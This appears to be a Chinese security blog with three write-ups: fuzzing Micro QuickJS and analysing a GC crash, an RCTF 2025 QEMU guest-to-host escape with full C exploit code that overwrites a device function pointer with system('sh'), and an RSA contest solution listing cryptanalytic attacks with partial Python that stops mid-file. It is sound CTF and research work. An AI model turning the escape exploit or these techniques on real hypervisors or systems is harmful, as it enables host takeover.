0. 起因

2025.12.23 传奇程序员 Bellard(Qemu、ffmpeg、QuickJS、TCC... 原作者)发布了他的新作品 Micro QuickJS(mqjs),这是一个用于嵌入式系统上的 JS 引擎。既然是用纯 C 语言实现的,应该会有一些内存损坏漏洞吧。

1. 准备 fuzzer

组件

我决定用 AFL++ 来运行模糊测试。AFL++ 直接使用的话,构造的是逐字节的随机输入,其中大多数都是无意义的乱码(即使配合 cmplog 等)。对于特定语言解释器来说,我们希望构造的输入能够真正被执行。编译原理告诉我们,从人类可读字符串到机器可执行的字节码或机器码需要经历至少三个阶段:词法分析、语法分析、语义分析。完全随机的输入无疑连词法分析都很难通过,更别说语法分析语义分析了。如果构造的输入根本没法运行,那我们就无法触及有关 VM 和 GC(垃圾回收释放内存)相关的更有价值的漏洞。

西电网信院在大二有一门选修课就是编译原理,最后的大作业是 C 语言标准库手搓自定义绘图语言编译器,十分带劲。不过据说从 24 级开始这门课🈚️了。

我感觉从 LLVM pass 上手会更有实用价值一些。

而如果配合 Grammar-Mutator,我们就可以实现语法级的 fuzzing。我们只需要提供这个语言的语法的生成式,自动编译成自定义 mutator。AFL 运行时就会调用它来将先前的 seed 转变为 AST,再随机选择 AST 中的节点,根据生成式变异为另一个节点或子树,最后再根据 AST 生成代码作为新的 seed。(具体可以看这篇文章

当然,编译时 Address Sanitizer 也必不可少(-fsanitize=address)。我试过再加上 UB Sanitizer,但是随便一运行就爆了,难道到处都是 UB?

问题修复

一开始运行 Grammar-Mutator 有时会报错 _pick_non_term_node returns NULL 然后直接退出。不知道为什么它在极罕见情况下会找不到某个非终结符能够用来变异的生成式。

遇到这种情况就不变异吧,直接把整个 AFL 停了真的好吗,,修改代码如下即可:

diff --git a/src/tree_mutation.c b/src/tree_mutation.c
index 68e91f9..3a29da5 100644
--- a/src/tree_mutation.c
+++ b/src/tree_mutation.c
@@ -39,8 +39,10 @@ tree_t *random_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
+
+    return mutated_tree;
 
   }

执行

编写 fuzzing harness 用于 persistent mode,同时按照 Grammar-Mutator 的官方文档编译好 mutator library,自动生成初始种子。我们在 aflplusplus/aflplusplus docker container 里用以下参数运行 AFL:

while true; do AFL_DISABLE_TRIM=1 AFL_CUSTOM_MUTATOR_LIBRARY=./libgrammarmutator-javascript.so AFL_USE_ASAN=1 afl-fuzz -i seeds/ -o out/ -b 2 -a text -G 1024 -t 200 -S asan -- ./mjs_harness_asan; sleep 1; done

运行过程中我总结了一些经验:

  • 我选择关闭 ptrim,因为对于语法级 fuzzing,trim 反而会丢失复杂的结构,使之后的变异难以发现新的分支。
  • 加上超时是对的,但是不能太低,跑得慢的 seed 反而更有价值(复杂的 GC 行为)。
  • Grammar-Mutator 根据 AST 进行变异像是一个无限深度递归,所以 cycles 几乎不会增长,这是正常的。

2. Fuzzing 结果

大约 11 小时后,第一批 crashes 出现了:

a0decb4d5ac7fed0f095f124b7c2f22e.png

id 000000 内容大概是:

var a = [];
var b = [];
var c = [];
var d = [];
(Infinity**((((a+(((((((((((((((((((((new Float64Array(0,0/0,0,{g: false})))))))))))))))))))))==(~0)))))));
function Float64Array(console, EvalError,Int16Array,Reflect,NaN){
new Float64Array(false,TypeError[[[((((((((((((((((((((((((((((((((((((((((((((((((((((d.concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat((((--b) >>> -0)),(((--b) >>> -0)),(((--b) >>> 
// 暂不完整公开 ...

可以看到其中有明显的无限递归,另外还有大量的 concat,这无疑同时给堆和栈带来了巨大的内存分配压力,也就很可能出现 GC 相关的漏洞。

对此,Address Sanitizer 的评价是:

=================================================================
==1599335==ERROR: AddressSanitizer: negative-size-param: (size=-2112)
    #0 0x55f81ffe8449 in __asan_memmove (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f8200c1be2 in JS_MakeUniqueString /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:2032:5
    #2 0x55f8200aab94 in JS_ToPropertyKey /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:4193:16
    #3 0x55f8200aab94 in JS_Call /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:6009:28
    #4 0x55f82011a802 in JS_Run /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:11799:11
    #5 0x55f82003e19b in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:140:15
    #6 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #7 0x55f820038a38 in LLVMFuzzerRunDriver (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cea38) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #8 0x55f8200385c6 in main (/home/rik/Desktop/crashes/mjs_harness_asan+0x1ce5c6) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #9 0x7f24f4027634 in __libc_start_call_main /usr/src/debug/glibc/glibc/csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7f24f40276e8 in __libc_start_main /usr/src/debug/glibc/glibc/csu/../csu/libc-start.c:360:3
    #11 0x55f81feef3e4 in _start (/home/rik/Desktop/crashes/mjs_harness_asan+0x853e4) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

0x7f24f0c4f8b8 is located 327864 bytes inside of 4194304-byte region [0x7f24f0bff800,0x7f24f0fff800)
allocated by thread T0 here:
    #0 0x55f81ffeb905 in malloc (/home/rik/Desktop/crashes/mjs_harness_asan+0x181905) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f82003cee9 in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:112:21
    #2 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

SUMMARY: AddressSanitizer: negative-size-param (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4) in __asan_memmove
==1599335==

负数 size?

过了一会,又出现了七百多个崩溃,我想是时候开始分析了。

3. 分析 crashes

Micro QuickJS 的 GC 过程如下:

先将整个堆扫描一遍来标记需要释放的对象(JS_MTAG_FREE),

/* 'size' is in bytes and must be multiple of JSW and > 0 */
static void set_free_block(void *ptr, uint32_t size)
{
    JSFreeBlock *p;
    p = (JSFreeBlock *)ptr;
    p->mtag = JS_MTAG_FREE;
    p->gc_mark = 0;
    p->size = (size - sizeof(JSFreeBlock)) / sizeof(JSWord);
}

然后在 JS_GC2 中使用 Jonkers 算法来释放内存(gc_compact_heap)。具体来说,就是把所有不是 JS_MTAG_FREE 标记的对象都向低地址移,填补所有 JS_MTAG_FREE 对象带来的空洞。

    /* pass 2: update the threaded pointers and move the block to its
       final position */
    new_ptr = ctx->heap_base;
    ptr = ctx->heap_base;
    while (ptr < ctx->heap_free) {
        gc_update_threaded_pointers(ctx, ptr, new_ptr);
        size = get_mblock_size(ptr);
        if (js_get_mtag(ptr) != JS_MTAG_FREE) {
            if (new_ptr != ptr) {
                memmove(new_ptr, ptr, size);
            }
            new_ptr += size;
        }
        ptr += size;
    }
    ctx->heap_free = new_ptr;

一个很关键的问题是,这样的 GC 有可能会移动对象的位置,所以 GC 的下一步是修改引用方的指针到移动后的位置。不在 JS VM 栈中的对象指针(例如在裸 C 数组里的 JS 对象指针)就无法被追踪到,它们就会立刻沦为垂悬指针。所以在编写 mqjs 期间需要时刻注意哪些函数可能触发 GC,并将临时变量推入 JS VM 栈中。

这几百个崩溃几乎都是因为没有注意到可能 GC 的函数导致的。例如 2 中提到的崩溃,

static JSValue JS_MakeUniqueString(JSContext *ctx, JSValue val) {
    // ...
    
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    val1 = find_atom(ctx, &a, arr, ctx->unique_strings_len, val); 
    if (!JS_IsNull(val1))
        return val1;
    
    JS_PUSH_VALUE(ctx, val);
    is_numeric = js_is_numeric_string(ctx, val);
    JS_POP_VALUE(ctx, val);
    if (is_numeric < 0)
        return JS_EXCEPTION;
    
    /* not found: add it in the table */
    JS_PUSH_VALUE(ctx, val);
    new_tab = js_resize_value_array(ctx, ctx->unique_strings,
                                 ctx->unique_strings_len + 1);
    JS_POP_VALUE(ctx, val);
    if (JS_IsException(new_tab))
        return JS_EXCEPTION;
    ctx->unique_strings = new_tab;
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    memmove(&arr->arr[a + 1], &arr->arr[a],
            sizeof(arr->arr[0]) * (ctx->unique_strings_len - a));
    
    // ...
}

可以看到 JS_MakeUniqueString 首先从 ctx->unique_strings 中搜索(find_atom)相同字符串的索引(a)。这是一种常见的优化,在创建任何字符串前都在一个字符串表里检查有没有重复字符串,如果有就直接使用它如果没有再分配新空间并插入表中,避免重复浪费内存。但是由于 ctx->unique_strings_lenfind_atommemmove 之间减小了(被 GC 清理了一部分),所以 ctx->unique_strings_len - a 变成了负数!(a 应该永远小于 ctx->unique_strings_len。)其中 js_is_numeric_stringjs_resize_value_array 都有可能触发 GC(主要是 js_is_numeric_string)。

按照以上思路,我们还能找到其他 GC UAF 漏洞,甚至可利用的漏洞。事实上,我们可以修改 mqjs 源码,使其在每次申请内存前都执行一次 GC,这样能更高效地挖掘出类似的漏洞,无需等待 AFL 随机出有 GC 压力的 seed。(这应该是一个通用的技巧)

4. 利用

...

5. 修复

对于 2 中提到的崩溃,比较简单的修复方案就是在 memmove 前再执行一次 find_atom 定位插入位置。另外 js_is_numeric_string 也不应该需要 O(n) 空间复杂度。

...

RCTF 2025 pwn,mstr 之后再复现一个相对简单的 qemu escape bbox,如果有空的话再看看那个 v8pwn。(画饼ing

Challenge

附件 docker archive 中 qemu-system-x86_64 实现了一个自定义 PCI 设备 virtsec-device。借助 AI 可以很快还原两个关键的结构体:

00000000 struct block // sizeof=0x18
00000000 {
00000000     unsigned int id;
00000004     unsigned int size;
00000008     unsigned int _pad1;
0000000C     unsigned int offset;
00000010     unsigned int _pad2;
00000014     unsigned __int8 encrypted;
00000015     unsigned __int8 valid;
00000016     unsigned __int8 _pad3[2];
00000018 };

00000000 struct virtsec_device // sizeof=0x10E8
00000000 {
00000000     unsigned __int8 _pad0[3024];
00000BD0     unsigned int status;
00000BD4     unsigned int session_id;
00000BD8     unsigned int error_code;
00000BDC     unsigned __int8 _pad1[32];
00000BFC     unsigned int alloc_size;
00000C00     unsigned int _pad2[2];
00000C08     struct block blocks[16];
00000D88     unsigned int _pad3;
00000D8C     unsigned int current_id;
00000D90     unsigned int merge_id1;
00000D94     unsigned int merge_id2;
00000D98     unsigned __int8 data[256];
00000E98     void (*func_ptr)(void *);
00000EA0     void *func_arg;
00000EA8     unsigned __int8 _pad4[256];
00000FA8     unsigned __int8 key_buffer[256];
000010A8     unsigned int reg_10A8;
000010AC     unsigned __int8 _pad6[36];
000010D0     unsigned __int64 reg_10D0;
000010D8     unsigned __int64 reg_10D8;
000010E0     unsigned __int64 reg_10E0;
000010E8 };

之后的逆向就比较轻松了。可以看到这个设备在 256 字节的空间里管理 16 个 blocks,每个块初始大小最高 0x10,但可以通过 merge 命令合并两个及多个块,直至 256 字节。设备还有 gift 寄存器,向其中写入任意内容后,设备将在设备结构体中紧随 data 之后分别写入 printf 函数指针和一个字符串指针,再次触发 gift 就会将后者作为首个参数执行前者。(另外还有 session、神秘 command 3 和 xor 加解密,不知道能干啥。)

这个 PCI 设备通过 MMIO 交互,我们可以在 virtsec_class_init 找到 Vendor ID 0x1234和 Device ID 0x5678。在 qemu 虚拟机内执行 lspci 查询 PCI resource 路径(00:04.0 Class 0580: 1234:5678)。

出题人非常贴心的在每个操作都输出了 log,要想看到 qemu_log 输出便于调试,可以添加 qemu 命令行参数 -d guest_errors -D qemu.logqemu_loglevel_mask_64(2048)LOG_GUEST_ERROR)。

Bug

问题出在块合并,merge 似乎没有任何长度检查,只要分配大于 16 个块合并在一起就能轻松拿到大于 256 字节的块,从而越界读写 gift。virtsec_free_block 提示 UAF 但其实应该没有。

Exploit

只需要将函数指针改成 system,参数改成 sh 就好了。然而由于某些神秘原因,直接向 offset 256 写入的话 qemu 就直接爆了(?

不过块合并时自然也会复制数据的,所以就改成先在小块里写好这两个数据然后越界合并覆盖就好。free block 竟然只能全部 reset,那只好重新 merge 一遍了。

有点不懂为什么 escape 之后又打印出 welcome to RCTF2025!This is my gift!hello,可能是 pwntools 的问题吧(

Exp:

#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

#define REG_CMD 0x0C
#define REG_ID 0x14
#define REG_SIZE 0x18
#define REG_MERGE1 0x30
#define REG_MERGE2 0x34
#define REG_GIFT 0x38

#define CMD_SESSION 1
#define CMD_ALLOC 2
#define CMD_SELECT 3
#define CMD_MERGE 4
#define CMD_RESET 6

int fd;
volatile void *mmio_ptr;

static void write_reg32(int offset, uint32_t value) {
    *(volatile uint32_t *)(mmio_ptr + offset) = value;
}

static void trig_gift() { write_reg32(REG_GIFT, 0xcafebabe); }

// static void new_session() { write_reg32(REG_CMD, CMD_SESSION); }

static void alloc_blk(uint32_t id, uint32_t size) {
    write_reg32(REG_ID, id);
    write_reg32(REG_SIZE, size);
    write_reg32(REG_CMD, CMD_ALLOC);
}

static void select_blk(uint32_t id) {
    write_reg32(REG_ID, id);
    // write_reg(REG_CMD, CMD_SELECT);
}

static void merge_blk(uint32_t id1, uint32_t id2) {
    write_reg32(REG_MERGE1, id1);
    write_reg32(REG_MERGE2, id2);
    write_reg32(REG_CMD, CMD_MERGE);
}

static void dev_res() { write_reg32(REG_CMD, CMD_RESET); }

static uint32_t read_data32(size_t offset) {
    return *(volatile uint32_t *)(mmio_ptr + 0x1000 + offset);
}

static uint64_t read_data64(size_t offset) {
    uint32_t low32 = read_data32(offset);
    uint32_t high32 = read_data32(offset + 4);
    return ((uint64_t)high32 << 32) | low32;
}

static void write_data32(size_t offset, uint32_t data) {
    *(volatile uint32_t *)(mmio_ptr + 0x1000 + offset) = data;
}

static void write_data64(size_t offset, uint64_t data) {
    write_data32(offset, (uint32_t)data);
    write_data32(offset + 4, (uint32_t)(data >> 32));
}

int main(void) {
    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR);
    if (fd < 0) {
        perror("open");
        exit(EXIT_FAILURE);
    }
    puts("[*] Device opened.");
    mmio_ptr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mmio_ptr == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    puts("[*] MMIO mmaped.");

    // new_session();
    for (size_t i = 0; i < 16; ++i) {
        alloc_blk(i, 0x10);
    }
    puts("[*] Blocks allocated.");
    for (size_t i = 1; i < 16; ++i) {
        merge_blk(0, i);
    }
    puts("[*] Blocks merged.");
    alloc_blk(1, 0x10);
    merge_blk(0, 1);
    puts("[+] Block merged overflow.");

    trig_gift();
    select_blk(0);
    size_t host_system_addr =
        read_data64(256) - 0xf980;                    // glibc system - printf
    size_t host_sh_addr = host_system_addr - 0x38761; // glibc "sh" - system
    printf("[+] Host `system` address: 0x%lx\n", host_system_addr);
    printf("[+] Host `\"sh\"` address: 0x%lx\n", host_sh_addr);

    dev_res();
    puts("[*] Reset.");
    for (size_t i = 0; i < 16; ++i) {
        alloc_blk(i, 0x10);
    }
    puts("[*] Blocks allocated.");
    for (size_t i = 1; i < 16; ++i) {
        merge_blk(0, i);
    }
    puts("[*] Blocks merged.");
    alloc_blk(1, 0x10);
    select_blk(1);
    write_data64(0, host_system_addr);
    write_data64(8, host_sh_addr);
    merge_blk(0, 1);
    puts("[+] Gift rewritten.");

    trig_gift();

    munmap((void *)mmio_ptr, 0x2000);
    close(fd);
    return 0;
}

直接读写 MMIO 的指针一定要 ➕ volatile,否则可能被编译器优化掉。

RSA 加密体制破译

来源:“RSA 大礼包”——首届(2016)全国高校密码数学挑战赛 赛题三

截获数据处理

首先按照赛题描述的帧结构提取所有的截获数据:

1024bit 模数 N | 1024bit 加密指数 e | 1024bit 密文 m^e mod N
Frame0:
N = 90058705186558569935261948496132914380077312570281980020033760044382510933070450931241348678652103772768114420567119848142360867111065753301402088676701668212035175754850951897103338079978959810673297215370534716084813732883918187890434411552463739669878295417744080700424913250020348487161014643951785502867
e = 46786465362686334917265996843779843233606992585424976481745055335468678697948774988450305612127967926533923268260412557000125153569622340353246096040604284883505587337829322949633637609180797447754513992039018904786537115087888005528547900640339270052628915440787357271345416818313808448127098885767015748889
c = 48641173720475702278690317652676924796340996697567087705119344461991930773386153198223372579328462635803653561516674380209276666328375805315553713680858906705068657158073776194628700821011001144559278784795978097710145192236347629751116534400207288736776545247409895672030976932673010818369814246455196991083
--------
Frame1:
N = 92921790800705826977497755832938592891062287903332844896046168726101016067456726822505517352409138948392871113192427210529297191908638888388136391240683157994654207338463678065440899870434887094216772312358731142317774259942199808535233769089985063860828267808621928898445383706310204223006136919334252875849
e = 65537
c = 1626661141529320283833484152716550848856697186049377493478368799832043379420727509223318694347625977694500761460048670101820769656612419734057871562023463159698522348510157125720014700549254630959391701883372400982386084212421115166791728704867253734354874934210987301137512341070190760227227749365878233484
--------
Frame2:
N = 90252653600964453524559669296618135272911289775949194922543520872164147768650421038176330053599968601135821750672685664360786595430028684419411893316074286312793730822963564220564616708573764764386830123818197183233443472506106828919670406785228124876225200632055727680225997407097843708009916059133498338129
e = 65537
c = 39632263504870478574861695051251850807454294787974709214866410237055871793939895562441267574482198916367858789237648434983815369123479208726344716594227785308836601932181727610859898951190206345056426253251079929822424252271957269630987623886812686545521745791771387808772030614435314730783528512800343192265
--------
Frame3:
N = 92270627783020341903769877272635163757611737252302329401876135487358785338853904185572496782685853218459404423868889360808646192858060332110830962463986164014331540336037718684606223893506327126112739408023014900003600028654929488487584130630596342720833061628867179840913592694993869009133576053124769728363
e = 5
c = 83421434286602546493364204139182949897795123160498680670964040331447569764445309937195566103281638928183742488663157138572020817924561990979723444797045375101801354862472761507421896454904818874439231990567738173059815647539737800523632262742398190575822391771655932895657208471832891505814792263361394479317
--------
Frame4:
N = 90058705186558569935261948496132914380077312570281980020033760044382510933070450931241348678652103772768114420567119848142360867111065753301402088676701668212035175754850951897103338079978959810673297215370534716084813732883918187890434411552463739669878295417744080700424913250020348487161014643951785502867
e = 152206992575706893484835984472544529509325440944131662631741403414037956695665533186650071476146389737020554215956181827422540843366433981607643940546405002217220286072880967331118344806315756304650248634546597784597963886656422706197757265316981889118026978865295597135470735576032282694348773714479076093197
c = 19560634556305755550927540610989537766715902244072312818350844104485773927537226443429404190213856361759564153804627450805880512600339869169513348929194643809859468549718922965997647689203029517135396008631050292544022651948009392475583045438153697076529266662217519588521116539517972522591294232192817502376
--------
Frame5:
N = 99193711547257063160816850544214924340574358752670644615293764532335872088470223740970673347993652626497557387222167784182876395436088845281840169701654629849214222297784511349059698963212947299142320497759258889425182705042123217476724761095690092179821753840224757786599021225709340258545979566824267620959
e = 65537
c = 26054677793581772924866273737009673285775062802734786532404396138990264566536537921648515854012553861999940229349708989519156563830916553754762208466745321226835312974971739761769324569315525872096987367001543758380071859429619580182411498650200401467760546057912183435480924905200466941116258838789328064564
--------
Frame6:
N = 146839643970016464813197409569004275595828791825722617066607993001682901023784267554815946189374651530288894322286859792246413142980277245909181062525398546369553995023529451396820549308690493928593324007689135648753323161394735120908960458860801743476353228970081369439513197105039143930008573928693059198131
e = 65537
c = 47190775807472506173587993082023759909601357229808667044044468676457696140445235738005020994278091230440755033222450219378047807646817722376918364211727971804312327204294555178996480944188624972632371674822397258127227029990196956900925820980263353418653201918881814896866168764140848945600419602253279143149
--------
Frame7:
N = 155266493936043103849855199987896813716831986416707080645036022909153373110367007140301635144950634879983289720164117794783088845393686109145443728632527874768524615377182297125716276153800765906014206797548230661764274997562670900115383324605843933035314110752560290540848152237316752573471110899212429555149
e = 3
c = 124929943232081828105808318993257526364596580021564021377503915670544445679836588765369503919311404328043203272693851622132258819278328852726005776082575583793735570095307898828254568015886630010269615546857335790791577865565021730890364239443651479580968112031521485174068731577348690810906553798608040451024
--------
Frame8:
N = 102900163930497791064402577447949741195464555746599233552338455905339363524435647082637326033518083289523250670463907211548409422234391456982344516192210687545692054217151133151915216123275005464229534891629568864361154658107093228352829098251468904800809585061088484485542019575848774643260318502441084765867
e = 5
c = 25585088950095290712328215701309273521406235982885781641137768116285362079062975527364909549362511146004390419156826709543326814581466248280564194951706937822088902607754944405407698735824315900942915322054614437632116732271787823814807624841386886185122143173564380877370643120953803688563589496390425159539
--------
Frame9:
N = 97767951046154372321400443371234495476461828137251939025051233003462769415459435471728054384852461870179980010660162922547425212869925648424741526671585598167502856111641944825179295197098826911226483155821197251989297102189187139234080795582529077092266799813985026581245196104843272305656744384140745492897
e = 65537
c = 14375950543873882011796759348848479283522955796749853113492047625299699702886303193822347995567175524401038661237990847185236138967814088030767785916645492142741397786256445305366822277551514353423864240674522264407918605662008550545442780563568811883349771003546081844527788515420708612431091464410712019656
--------
Frame10:
N = 93836514358344173762895084384953633159699750987954044414830106276642828025218933012478990865656107605541657809389659063108620208004740646099662700112782252200834393363574089818787717951026690934986964275526538236750596344542450864284576226592039259070002692883820960186403938410354082341916474419847211138467
e = 65537
c = 78852785408127338210375705302361611580033298047358566712385067002412358292419274287993295604646693755514055710305938805847184012173449160624823261013152092151242661538772012880714981492275731658527465442787266554947828301571586721387286510359738598116104180351027973922256460236377354127082438812404967605644
--------
Frame11:
N = 112306066601652819062206435724795595603085908011001671184332227488970057128128821831260649058569739569103298091727188365019228385820143813415009397359257831092635374404034997011441653286642458431865026213129412677064308342580757248577955071384972714557250468686599901682728173096745710849318629959223270431039
e = 3
c = 108387832390337770947361518376552702503741092284778824448943971792044922720461955035726863109418657218498659460663504872870862538725835055240750735576735249122665348803252691221869146679004017916359067454693701495389784159620341860394035373599823801288442604273046729873467936004227013186659110262247417571857
--------
Frame12:
N = 90267480939368160749458049207367083180407266027531212674879245323647502822038591438536367206422215464489854541063867946215243190345476874546091188408120551902573113507876754578290674792643018845798263156849027209440979746485414654160320058352559498237296080490768064578067282805498131582552189186085941328701
e = 5
c = 44374979291120575503988741531987454898919254880086464254904878064332010355432423956182135846738023874326776872139229379943321321362822522900479438294291206287205647145759972233097276253408812699557305314344220807356024994977399840843758750494467535572805794732065369887057841293267499209427585419962565568495
--------
Frame13:
N = 94390533992358895550704225180484604016029781604622607833044135524814562613596803297695605669157378162035217814540004231075201420796787547733762265959320018107419058832819010681344133011777479722382525797938558181629835768471461434560813554411133962651212455645589624432040989600687436833459731886703583047283
e = 65537
c = 41663689952657185984513733558388033289292857758748468070934326941659317694408873831451567385012905508903797893149006067280788298408959017459890579859784072677410890657854942639040056924596925599973762214900728648657052474974405878868755028761443878403349272421153452240103741921751653022646614028009138548572
--------
Frame14:
N = 120008876536855131221255979370745233738591934188224528487535120483456214085493237482915446419599357910343450285858995374277365393767669569942204888383426461862651659865189178784473131914234181752055950431093341514138390898892413182538823693941124637301582389014479754627419560568004831093116617428970538503551
e = 65537
c = 35133765260146855599194761500993159592311136378033858818728078464540389548474611501950689942825550399101504201020687961256642455745888410410524955937773951578993882275525944145131794970001708655718844507774877602125183877782393564092461821246419013099835940432551540513624090850765797735157630551978900512155
--------
Frame15:
N = 147733349387696521015664992396355145811249793103958464053225389476050097503928022819269482555955365534137156079172704297584033078453033637103720972881068435459202133846880715879894340131656691631756162323422868846616160423755883726450486845175227682329583615739797782025647376042249605775433971714513081755709
e = 3
c = 52253817590056116368273294519761274350847193477090280916373828903718796358618956145225746496960677477661151583828604021049936963779103440560630451125137344639503705880024677345063113240530798352727432768980751992926293801206779839157443722614687126711272753610923903360818026083573711899014859313677159790039
--------
Frame16:
N = 90673177193017332602781813187879442725562909473411994052511479411887936365983777106776080722300002656952655125041151156684340743907349108729774157616323863062525593382279143395837261053976652138764279456528493914961780300269591722101449703932139132398288208673556967030162666354552157189525415838326249712949
e = 5
c = 24086371701602948122317790211004032014326487279907486724991846810668564197542368948703436295770758262739732290677177527297040556666434577730354732397784651220918412407485171180732327730242552955646750279842251200227937257322414662213662054605527282812231172173474061845763736546747711105935349033514358348526
--------
Frame17:
N = 111178307033150739104608647474199786251516913698936331430121060587893564405482896814045419370401816305592149685291034839621072343496556225594365571727260237484885924615887468053644519779081871778996851601207571981072261232384577126377714005550318990486619636734701266032569413421915520143377137845245405768733
e = 65537
c = 1395222187334055833498435136007269572138525113145744882969531037442244086277594803865217301719947066153176244638660864035949705664670633245110847416168796640199238733478540080417312141011028469385167826450855601412915611725028631975605932279023918771764204031806414734015476034106891049334159757621016327648
--------
Frame18:
N = 93394639108667212482180458616036741615058981058942739509025631675767304945732437421192075466824789572910657586684470553691049259504106442090140927782673066834126848556317079995332229262871079799089771973100731889841015960713908117908583988637159206246729697336281050046919985463146705713899703248595045701819
e = 65537
c = 49047978458885807127192385282227726754593888749388775377492411121925201201621099927332087316607446894372751446254341808051569111053293066232980434901592875347200122022210780536817524813076908750647137301610117592355818408280291766068780616226847056325075159440352473034526412778650516438709293396458312728764
--------
Frame19:
N = 94154993593274109828418786834159728190797445711539243887409583756844882924221269576486611543668906670821879426307992404721925623741478677756083992902711765865503466687919799394258306574702184666207180530598057989884729154273423032471322027993848437082723045300784582836897839491321003685598931080456249945287
e = 65537
c = 52958695992371180409414011678115981405835026800648278393085136639708219930134280877954018305615378579281651249142230848262822421713895227069561145945972448893229231020632492517869034217943260664130647322694583182800800838539691542175229797652856708373533581250607375664993806654537737027000328299623032632769
--------
Frame20:
N = 90916739755838083837461026375700330885001446224187511395518230504776419813625940046511904838818660297497622072999229706061698225191645268591198600955240116302461331913178712722096591257619538927050886521512453691902946234986556913039431677697816965623861908091178749411071673467596883926097177996147858865293
e = 5
c = 23204039098754030513954332212496652705175644349879686639449689791620605370809827884267260830136516742466455588549253481016504796674014871020503543639681251834114159250986728840380777774144853925216884802529230212783759821262799845229436535491711201551797166082529740271577684082458494926929260818927584104158

破解过程

  1. 从参数选择已经可以看到一些问题:

    • Frame0 和 Frame4 模数相同,考虑共模攻击(成功);

      ​ Frames[0, 4]: Seq 0, Text My secre

    • Frame3、8、12、16、20 指数相同,考虑广播攻击(成功);

      ​ Frames[3, 8, 12, 16, 20]: Seq 1, Text t is a f

    • Frame7、11、15 指数为 3,考虑小指数攻击爆破 k(失败);
    • Frame4 指数非常大,则 d 较小,考虑维纳攻击(已破解,无意义)。

  2. 另外我们还可以尝试分解模数质因子,采用 GCD、费马小定理、Pollard(生日悖论)算法:

    • Frame1 和 18 成功被 GCD 分解,模数共享一个素因子;

      ​ Frame 1: Seq 11, Text . Imagin

      ​ Frame 18: Seq 10, Text m A to B

    • Frame10 成功被费马小定理分解,模数素因子 p、q 相近;

      ​ Frame 10: Seq 8, Text will get

    • Frame2、6、19 成功被 Pollard p-1 算法分解。

      ​ Frame 2: Seq 6, Text That is

      ​ Frame 6: Seq 7, Text "Logic

      ​ Frame 19: Seq 5, Text instein.

  3. 根据赛题描述的明文填充方式和已破解的明文,我们知道明文高位有固定的标志位 0x9876543210abcdef 和范围极小的顺序索引(0~20)以及 0 填充,且 Frame7、11、15 指数为 3,考虑 Coppersmith 攻击(成功)。

    分片明文填充为 512 比特消息后再进行加密,填充规则为高位添加 64 比特标志位,随后加上 32 比特通信序号,再添加若干个 0,最后 64 比特为明文分片字符对应的 ASCII 码

    ​ Frame 7: Seq 2, Text amous sa

    ​ Frame 11: Seq 3, Text ying of

    ​ Frame 15: Seq 4, Text Albert E

  4. 最终 Frame5、9、13、14、17 无法在合理时间内破解。但可以根据顺序索引和已破解的明文上下文猜测其明文:

    ​ Frame5: Seq 12, Text ation wi

    ​ Frame9: Seq 13, Text ll take

    ​ Frame13: Seq 14, Text you ever

    ​ Frame14: Seq 9, Text you fro

    ​ Frame17: Seq 15, Text ywhere."

完整明文

My secret is a famous saying of Albert Einstein. That is "Logic will get you from A to B. Imagination will take you everywhere."

源代码

from sys import set_int_max_str_digits
from os import path
from dataclasses import dataclass
from collections import defaultdict
from concurrent.futures import ProcessPoolExecutor
from itertools import combinations
from gmpy2 import mpz, iroot, gcd, invert, powmod, is_prime
from sage.all import PolynomialRing, Zmod

DATA_DIR = '附件3-2(发布截获数据)'
FLAG_HEX = "9876543210abcdef"
FLAG_VAL = int(FLAG_HEX, 16)


@dataclass
class Frame:
    idx: int
    n: mpz
    e: mpz
    c: mpz


def load_frames() -> list[Frame]:
    frames = []
    for i in range(21):
        with open(path.join(DATA_DIR, f'Frame{i}'), 'r') as file:
            content = file.read().strip()
            payload = bytes.fromhex(content)
            n = mpz(int.from_bytes(payload[0:128], 'big'))
            e = mpz(int.from_bytes(payload[128:256], 'big'))
            c = mpz(int.from_bytes(payload[256:], 'big'))
            frames.append(Frame(i, n, e, c))
    return frames


